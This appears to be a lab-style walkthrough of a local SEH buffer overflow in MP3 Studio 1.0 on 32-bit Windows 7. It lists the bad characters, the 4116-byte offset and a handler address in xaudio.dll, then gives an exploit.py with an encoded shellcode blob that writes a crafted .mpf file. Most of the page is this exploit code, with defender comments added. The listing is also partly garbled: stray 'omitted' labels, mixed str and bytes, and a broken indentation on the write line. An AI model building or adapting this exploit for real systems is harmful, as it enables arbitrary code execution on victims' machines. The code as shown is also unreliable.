MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH) Walkthrough

reference MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

badchar

omitted
\x00\x0a\x0d\x1a

offset

omitted
4116

return address

seh

omitted
xaudio.dll 0x1001f668

shellcode

exploit.py

exploit.py
# Proof-of-concept generator from the walkthrough: writes a crafted .mpf file
# whose oversized content overflows a buffer in MP3 Studio 1.0 and overwrites
# the SEH record (structured exception handler) on the stack.
#
# Defender's view of the artifact this produces: a .mpf file of roughly 4 KB of
# 0x41 filler followed by a fixed handler address taken from xaudio.dll
# (0x1001f668 per the walkthrough) and an encoded payload. The controls that
# matter against this class of overwrite are SafeSEH/SEHOP on the handler
# module and DEP/ASLR on the process; the walkthrough does not state which of
# these the target lacks, so treat that as an assumption to confirm.

# Encoded payload bytes exactly as listed in the walkthrough. The walkthrough
# lists \x00\x0a\x0d\x1a as the bad characters excluded from it; the encoder
# and the payload's function are not stated on this page.
shellcode =  b""
shellcode += b"\xb8\xcb\xdf\x29\x1c\xda\xc7\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x52\x31\x42\x12\x83\xea\xfc"
shellcode += b"\x03\x89\xd1\xcb\xe9\xf1\x06\x89\x12\x09\xd7"
shellcode += b"\xee\x9b\xec\xe6\x2e\xff\x65\x58\x9f\x8b\x2b"
shellcode += b"\x55\x54\xd9\xdf\xee\x18\xf6\xd0\x47\x96\x20"
shellcode += b"\xdf\x58\x8b\x11\x7e\xdb\xd6\x45\xa0\xe2\x18"
shellcode += b"\x98\xa1\x23\x44\x51\xf3\xfc\x02\xc4\xe3\x89"
shellcode += b"\x5f\xd5\x88\xc2\x4e\x5d\x6d\x92\x71\x4c\x20"
shellcode += b"\xa8\x2b\x4e\xc3\x7d\x40\xc7\xdb\x62\x6d\x91"
shellcode += b"\x50\x50\x19\x20\xb0\xa8\xe2\x8f\xfd\x04\x11"
shellcode += b"\xd1\x3a\xa2\xca\xa4\x32\xd0\x77\xbf\x81\xaa"
shellcode += b"\xa3\x4a\x11\x0c\x27\xec\xfd\xac\xe4\x6b\x76"
shellcode += b"\xa2\x41\xff\xd0\xa7\x54\x2c\x6b\xd3\xdd\xd3"
shellcode += b"\xbb\x55\xa5\xf7\x1f\x3d\x7d\x99\x06\x9b\xd0"
shellcode += b"\xa6\x58\x44\x8c\x02\x13\x69\xd9\x3e\x7e\xe6"
shellcode += b"\x2e\x73\x80\xf6\x38\x04\xf3\xc4\xe7\xbe\x9b"
shellcode += b"\x64\x6f\x19\x5c\x8a\x5a\xdd\xf2\x75\x65\x1e"
shellcode += b"\xdb\xb1\x31\x4e\x73\x13\x3a\x05\x83\x9c\xef"
shellcode += b"\x8a\xd3\x32\x40\x6b\x83\xf2\x30\x03\xc9\xfc"
shellcode += b"\x6f\x33\xf2\xd6\x07\xde\x09\xb1\xe7\xb7\x10"
shellcode += b"\x18\x80\xc5\x12\x9b\xeb\x43\xf4\xf1\x1b\x02"
shellcode += b"\xaf\x6d\x85\x0f\x3b\x0f\x4a\x9a\x46\x0f\xc0"
shellcode += b"\x29\xb7\xde\x21\x47\xab\xb7\xc1\x12\x91\x1e"
shellcode += b"\xdd\x88\xbd\xfd\x4c\x57\x3d\x8b\x6c\xc0\x6a"
shellcode += b"\xdc\x43\x19\xfe\xf0\xfa\xb3\x1c\x09\x9a\xfc"
shellcode += b"\xa4\xd6\x5f\x02\x25\x9a\xe4\x20\x35\x62\xe4"
shellcode += b"\x6c\x61\x3a\xb3\x3a\xdf\xfc\x6d\x8d\x89\x56"
shellcode += b"\xc1\x47\x5d\x2e\x29\x58\x1b\x2f\x64\x2e\xc3"
shellcode += b"\x9e\xd1\x77\xfc\x2f\xb6\x7f\x85\x4d\x26\x7f"
shellcode += b"\x5c\xd6\x56\xca\xfc\x7f\xff\x93\x95\x3d\x62"
shellcode += b"\x24\x40\x01\x9b\xa7\x60\xfa\x58\xb7\x01\xff"
shellcode += b"\x25\x7f\xfa\x8d\x36\xea\xfc\x22\x36\x3f"

# Layout of the crafted file, following the walkthrough's numbers:
#   - filler up to the 4116-byte offset, less the 4 bytes of the nSEH slot;
#   - nSEH slot: 0xEB is the x86 short-JMP opcode, so this hops forward over
#     the handler address into the sled (two 0x41 bytes pad the 4-byte slot);
#   - SEH handler slot: 0x1001f668 from xaudio.dll, written little-endian;
#   - a 32-byte NOP (0x90) sled, then the encoded payload.
# NOTE(review): `payload` is built as str while `shellcode` is bytes, and the
# write call below lost its indentation in reproduction; the listing as shown
# on this page is not runnable verbatim.
payload = "A" * (4116 - 4)
payload += "\xeb\x26\x41\x41"
payload += "\x68\xf6\x01\x10"
payload += "\x90" * 32
payload += shellcode

# The output file name is the artifact a file-based detection would key on
# (oversized .mpf, long 0x41 run, fixed xaudio.dll address).
with open("exploit.mpf", "w") as fp:
fp.write(payload)

proof

Open File(s)...